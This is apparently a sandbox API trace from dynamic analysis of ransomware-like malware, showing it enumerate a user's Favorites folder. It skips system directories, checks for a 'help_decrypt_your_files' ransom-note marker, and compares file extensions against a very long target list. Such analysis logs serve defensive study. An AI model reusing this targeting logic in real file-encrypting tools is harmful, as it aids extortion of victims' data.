	[0189.904] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\*.*") returned 0x23
	[0189.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.904] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="windows") returned 0x0
	[0189.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.905] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="boot") returned 0x0
	[0189.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.905] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="system volume information") returned 0x0
	[0189.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.905] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0189.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.905] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="temp") returned 0x0
	[0189.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.906] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="program files") returned 0x0
	[0189.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.906] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="program files (x86)") returned 0x0
	[0189.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.906] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="appdata") returned 0x0
	[0189.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.906] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="application data") returned 0x0
	[0189.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.907] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="winnt") returned 0x0
	[0189.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.907] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="tmp") returned 0x0
	[0189.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.907] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="cache") returned 0x0
	[0189.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.907] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="temporary internet files") returned 0x0
	[0189.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.908] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="webcache") returned 0x0
	[0189.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.908] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="inetcache") returned 0x0
	[0189.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.909] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="nvidia") returned 0x0
	[0189.909] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.909] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="packages") returned 0x0
	[0189.909] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.909] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="cookies") returned 0x0
	[0189.910] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.910] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="programdata") returned 0x0
	[0189.910] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0189.910] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1
	[0189.910] lstrcmpW (lpString1="Bing.url", lpString2="..") returned 1
	[0189.910] lstrcmpW (lpString1="Bing.url", lpString2=".") returned 1
	[0189.910] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\"
	[0189.910] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpString2="Bing.url" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url"
	[0189.911] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url") returned 40
	[0189.911] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.911] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url", cchLength=0x28 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url") returned 0x28
	[0189.911] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.911] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.911] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url" | out: lpString1="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url") returned="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url"
	[0189.911] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\favorites\\bing.url") returned 40
	[0189.911] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.912] StrStrW (lpFirst=".url", lpSrch=".") returned=".url"
	[0189.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.912] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".url") returned 0x0
	[0189.912] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0189.912] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0189.913] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0189.913] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\"
	[0189.913] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini"
	[0189.913] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini") returned 43
	[0189.913] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.913] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini") returned 0x2b
	[0189.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.913] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.914] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini"
	[0189.914] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini") returned 43
	[0189.914] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.914] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0189.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.914] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0189.915] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0189.915] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0
	[0189.915] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0189.915] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0189.915] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites"
	[0189.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*"
	[0189.915] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
